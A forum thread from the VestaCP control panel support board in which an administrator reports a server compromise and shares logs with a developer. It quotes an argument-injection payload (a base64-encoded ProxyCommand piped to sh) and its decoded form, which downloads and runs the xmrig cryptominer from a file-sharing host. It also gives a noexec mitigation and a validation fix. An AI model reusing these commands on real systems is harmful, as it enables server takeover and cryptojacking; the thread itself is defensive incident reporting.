[CLOSED] [Urgent!] Critical Security issue in VestaCP

jcerdan · Post by **jcerdan** » Sat Jun 23, 2018 11:22 am

Hi,

We have discovered what seems a security issue in VestaCP. This is what we have seen until now:
Attackers upload a file in /tmp for mining: /tmp/xmrig

We have seen this in vesta error log:

Code: Select all

2018-06-23 01:01:40 v-add-backup-host  'sftp' 'xx' '"-oProxyCommand=echo Y2QgL3RtcDtwa2lsbCB4bXItc3Rhaztwa2lsbCB4bXJpZztybSAtZiB4bXJpZyB4bXItc3RhayBjcHUudHh0IHBvb2xzLnR
4dCBjb25maWcudHh0O3dnZXQgLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAtcU8geG1yaWcgaHR0cHM6Ly90cmFuc2Zlci5zaC9leXo0ei94bXJpZyYmY2htb2QgK3ggeG1yaWcmJi4veG1yaWcgLS1hbGdvPWNyeXB0b25pZ2h
0IC0tdXJsPXBvb2wubWluZXhtci5jb206ODAgLS11c2VyPTQyeTFRRkJEU1ZtWFpidlpaOTVDTnBQb01kZExTNGRSUGRtaDlXZ0NSM3ZFNUQxYjJYcUdTVjVLb0JIdVBGU3VBalM3WXI3dHA0OGY5QU1WTFh1Z0R1VU1GbXA
2dWdkIC0tdGhyZWFkPSQoZ3JlcCBwcm9jZXNzb3IgL3Byb2MvY3B1aW5mb3x3YyAtbCkgLS1kb25hdGUtbGV2ZWw9MSAtLWJhY2tncm91bmQgPC9kZXYvbnVsbCAyPiYxID4vZGV2L251bGwK|base64 -d|sh" x' '****
**' [Error 15]

This is what this does:

Code: Select all

cd /tmp;pkill xmr-stak;pkill xmrig;rm -f xmrig xmr-stak cpu.txt pools.txt config.txt;wget --no-check-certificate -qO xmrig https://transfer.sh/rysmn/xmrig&&chmod +x xmrig&&./xmrig --algo=cryptonight --url=pool.minexmr.com:80 --user=42y1QFBDSVmXZbvZZ95CNpPoMddLS4dRPdmh9WgCR3vE5D1b2XqGSV5KoBHuPFSuAjS7Yr7tp48f9AMVLXugDuUMFmp6ugd --thread=$(grep processor /proc/cpuinfo|wc -l) --donate-level=1 --background </dev/null 2>&1 >/dev/null

We think this can be mitigated by mounting /tmp with noexec by doing this:

tmpfs /tmp tmpfs rw,nodev,nosuid,noexec 0 0

in LXC container.

We think this is important and developers should have a look asap!

jcerdan · Post by **jcerdan** » Sat Jun 23, 2018 1:44 pm

Hi,

We have found this on /var/log/vesta/nginx-access.log

192.99.151.112 - - [23/Jun/2018:01:01:39 +0200] POST /api/index.php HTTP/1.1 "499" 0 "-" "curl/7.60.0" "-"

Regards,

jcerdan · Post by **jcerdan** » Sat Jun 23, 2018 1:56 pm

Hi,

More info: Vesta was up to date:
# dpkg -l | grep vesta
ii vesta 0.9.8-21 amd64 Vesta
ii vesta-ioncube 0.9.8-21 amd64 ionCube Loader for Vesta
ii vesta-nginx 0.9.8-21 amd64 Vesta Nginx
ii vesta-php 0.9.8-21 amd64 Vesta php-fpm
ii vesta-softaculous 0.9.8-21 amd64 softaculous plugin for Vesta

regards

jcerdan · Post by **jcerdan** » Sat Jun 23, 2018 8:28 pm

Hi,

I have checked v-add-backup-host. I think

Code: Select all

is_user_format_valid()

should be added to the section 'Verifications'.

Please, this is important. If someone at VestaCP could have a look.

Regards.

Post by **dpeca** » Sat Jun 23, 2018 8:58 pm

When exactly that server is installed?
Check creation date of /root/vst_install_backups folder.

jcerdan · Post by **jcerdan** » Sat Jun 23, 2018 9:01 pm

Hi,

drwxr-xr-x 3 root root 4096 Apr 5 2017 vst_install_backups

Regards

Post by **dpeca** » Sat Jun 23, 2018 9:08 pm

Can you send us nginx-access.log to dev _at_ vestacp.com ?
Also, /var/log/apache2/domains/YOUR-HOSTNAME.log will be nice if you send (apache2 or httpd folder, depending on distribution)

jcerdan · Post by **jcerdan** » Sat Jun 23, 2018 9:16 pm

Hi,

I have just sent 3 logs:

vesta nginx-access.log
vesta nginx-error.log
apache <host> log

Regards

Vesta Control Panel - Forum

[CLOSED] [Urgent!] Critical Security issue in VestaCP

[CLOSED] [Urgent!] Critical Security issue in VestaCP

Re: Critical Security issue in VestaCP

Re: Critical Security issue in VestaCP

Re: Critical Security issue in VestaCP

Re: [Urgent!] Critical Security issue in VestaCP

Re: [Urgent!] Critical Security issue in VestaCP

Re: [Urgent!] Critical Security issue in VestaCP

Re: [Urgent!] Critical Security issue in VestaCP

Login • Register